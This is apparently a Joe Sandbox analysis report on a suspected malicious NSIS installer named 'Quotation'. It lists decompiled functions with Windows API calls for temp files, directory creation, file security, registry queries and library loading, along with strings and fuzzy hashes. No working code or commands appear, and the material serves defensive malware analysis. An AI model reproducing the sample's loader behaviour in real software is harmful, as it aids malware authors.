                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                            • API String ID: 2200240437-1946221925
                                                                                            • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                            • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                                            • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                            • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 778 406a34-406a40 779 406a41-406a73 GetTickCount GetTempFileNameW 778->779 780 406a75-406a77 779->780 781 406a7e 779->781 780->779 782 406a79-406a7c 780->782 783 406a80-406a83 781->783 782->783
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00406A50
                                                                                            • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406A6B
                                                                                            Strings
                                                                                            • a, xrefs: 00406A49
                                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
                                                                                            • n, xrefs: 00406A42
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                                                                            • API String ID: 1716503409-3489432095
                                                                                            • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                                            • Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
                                                                                            • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                                            • Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 784 4068c4-4068da GetModuleHandleA 785 4068e6-4068ee GetProcAddress 784->785 786 4068dc-4068dd call 40617c 784->786 787 4068f4-4068f6 785->787 789 4068e2-4068e4 786->789 789->785 789->787
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                              • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                              • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                              • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                            • API String ID: 2547128583-890815371
                                                                                            • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                            • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                                            • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                            • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 790 405e1c-405e65 CreateDirectoryW 791 405e67-405e72 GetLastError 790->791 792 405e8a-405e8c 790->792 793 405e94-405e95 791->793 794 405e74-405e88 SetFileSecurityW 791->794 792->793 794->792 795 405e8e GetLastError 794->795 795->793
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
                                                                                            • GetLastError.KERNEL32 ref: 00405E67
                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
                                                                                            • GetLastError.KERNEL32 ref: 00405E8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                            • String ID:
                                                                                            • API String ID: 3449924974-0
                                                                                            • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                                            • Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
                                                                                            • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                                            • Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 796 406955-406988 call 4062b6 799 4069c7-4069c9 796->799 800 40698a-4069b9 RegQueryValueExW RegCloseKey 796->800 802 4069cc-4069ce 799->802 800->799 801 4069bb-4069bf 800->801 801->802 803 4069c1-4069c5 801->803 803->799 803->802
                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
                                                                                            • RegCloseKey.KERNELBASE(?), ref: 004069A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseQueryValue
                                                                                            • String ID: Call
                                                                                            • API String ID: 3356406503-1824292864
                                                                                            • Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                                            • Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
                                                                                            • Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                                            • Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 804 405842-405860 OleInitialize call 4054c6 806 405865-405867 804->806 807 405894-4058ab call 4054c6 OleUninitialize 806->807 808 405869 806->808 809 40586c-405871 808->809 811 405882-40588a 809->811 812 405873-405880 call 401399 809->812 811->809 815 40588c 811->815 812->811 817 40588e 812->817 815->807 817->807
                                                                                            APIs
                                                                                            • OleInitialize.OLE32(00000000), ref: 00405852
                                                                                              • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 0040589E
                                                                                              • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                              • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                            Strings
                                                                                            • Inklinerede Setup: Installing, xrefs: 00405842
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$InitializeUninitialize
                                                                                            • String ID: Inklinerede Setup: Installing
                                                                                            • API String ID: 1011633862-1772282993
                                                                                            • Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                                            • Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
                                                                                            • Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                                            • Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
                                                                                            • GetLastError.KERNEL32 ref: 00405E0E
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DFC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 1375471231-297319885
                                                                                            • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                                            • Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
                                                                                            • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                                            • Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8
                                                                                            APIs
                                                                                              • Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A44
                                                                                              • Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A4A
                                                                                              • Part of subcall function 6FF82351: GlobalFree.KERNEL32(?), ref: 6FF82A50
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF81738
                                                                                            • FreeLibrary.KERNEL32(?), ref: 6FF817C3
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 6FF817E9
                                                                                              • Part of subcall function 6FF81FCB: GlobalAlloc.KERNEL32(00000040,?), ref: 6FF81FFA
                                                                                              • Part of subcall function 6FF817F7: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,6FF81708,00000000), ref: 6FF8189A
                                                                                              • Part of subcall function 6FF81F1E: wsprintfW.USER32 ref: 6FF81F51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2392860438.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2392819480.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392898667.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2392959180.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6ff80000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 3962662361-0
                                                                                            • Opcode ID: 4ac4876d2ea26972018257c57ff5adb6bbec973041266ca69295e739676abd87
                                                                                            • Instruction ID: c6dd1827c295a0579d783a89fe0c2cbc59a821cb11c1c30bda7c5a9ab590f1ed
                                                                                            • Opcode Fuzzy Hash: 4ac4876d2ea26972018257c57ff5adb6bbec973041266ca69295e739676abd87
                                                                                            • Instruction Fuzzy Hash: 4541A232404349AFDB209F68D944BDE37F8BF02325F00421EF97D9A296DB79B544C651
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                                            • Instruction ID: 15b31486c92c371a01b824ec8c308dd00c5fb3f6de234e3455dc008c55755f60
                                                                                            • Opcode Fuzzy Hash: 21554dfdf2296733f6a7aae3810b83fc303a9337ac7eb4ef6af54ee552a22d80
                                                                                            • Instruction Fuzzy Hash: 2A01D472E542309BD7196F28AC09B2A2699A7C1711F15893EF901F72F1E6B89D01879C
                                                                                            APIs
                                                                                              • Part of subcall function 00406AF8: lstrcpynW.KERNEL32(?,?,00000400,0040384F,007A7540,NSIS Error), ref: 00406B05
                                                                                              • Part of subcall function 00406BA3: CharNextW.USER32(?,?,?,00000000,007A4288,0040662D,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 00406BB2
                                                                                              • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BB7
                                                                                              • Part of subcall function 00406BA3: CharNextW.USER32(00000000), ref: 00406BD1
                                                                                              • Part of subcall function 00406D1B: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406D90
                                                                                              • Part of subcall function 00406D1B: CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
                                                                                              • Part of subcall function 00406D1B: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DA4
                                                                                              • Part of subcall function 00406D1B: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00406DBC
                                                                                            • lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
                                                                                            • GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                                              • Part of subcall function 004065AD: FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                                              • Part of subcall function 004065AD: FindClose.KERNEL32(00000000), ref: 004065C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$FileFind$AttributesCloseFirstPrevlstrcpynlstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 1879705256-0
